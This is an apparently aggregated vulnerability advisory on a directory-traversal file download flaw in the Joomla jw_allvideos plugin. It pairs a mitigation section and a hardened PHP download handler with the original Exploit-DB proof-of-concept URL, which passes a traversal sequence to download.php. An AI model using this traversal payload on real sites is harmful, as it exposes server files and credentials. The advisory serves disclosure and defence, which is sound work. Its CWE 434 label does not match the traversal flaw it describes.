Vendor: jw_allvideos Plugin
By: Pouya Daneshmand
CVSS: 6,4 (MEDIUM)
Type: Remote File Download
CWE: 434
Product Name: jw_allvideos Plugin
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:joomla:joomla:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla (jw_allvideos Plugin) Remote File Download Vulnerability

A vulnerability in the Joomla jw_allvideos plugin allows an attacker to download arbitrary files from the server. The plugin's download.php does not validate its file parameter, so a crafted URL containing directory-traversal sequences can be used to download any file from the server.

Mitigation:

Input validation should be implemented in the download.php file to prevent attackers from downloading arbitrary files from the server.
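
One way to implement the validation described above, as an added example (not the plugin's own code): a download handler that canonicalizes the requested path and serves it only if it stays inside a fixed media directory. The MEDIA_ROOT location, the extension allowlist and the resolve_download() name are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened replacement for a download handler.
// MEDIA_ROOT, ALLOWED_EXT and resolve_download() are illustrative assumptions.

const MEDIA_ROOT  = __DIR__ . '/media';                    // assumed media directory
const ALLOWED_EXT = ['flv', 'mp3', 'mp4', 'swf', 'wmv'];   // assumed allowlist

/** Return the canonical path of a permitted file, or null if the request is rejected. */
function resolve_download(string $requested, string $root = MEDIA_ROOT): ?string
{
    // Empty names and embedded NUL bytes are never valid.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Only media types the plugin is meant to serve; blocks .php, .ini, etc.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // realpath() resolves "..", "." and symlinks; it returns false if the file is missing.
    $rootReal = realpath($root);
    $target   = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($rootReal === false || $target === false || !is_file($target)) {
        return null;
    }
    // Containment check on the canonical path, with a trailing separator so
    // that "/media-private" is not accepted as being inside "/media".
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Array-valued parameters (?file[]=x) are treated as an empty request.
$raw  = $_GET['file'] ?? '';
$path = resolve_download(is_string($raw) ? $raw : '');
if ($path === null) {
    http_response_code(404);   // same response for every rejection reason
    exit;
}
$name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

The containment check runs on the canonical path rather than on the raw parameter, so encoded or nested traversal sequences are resolved before the comparison instead of being filtered by pattern.
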
Source

Exploit-DB raw data:

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Joomla (jw_allvideos Plugin)
# Version: 1.0
#################################################################
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
#################################################################
# Vulnerability:
# http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################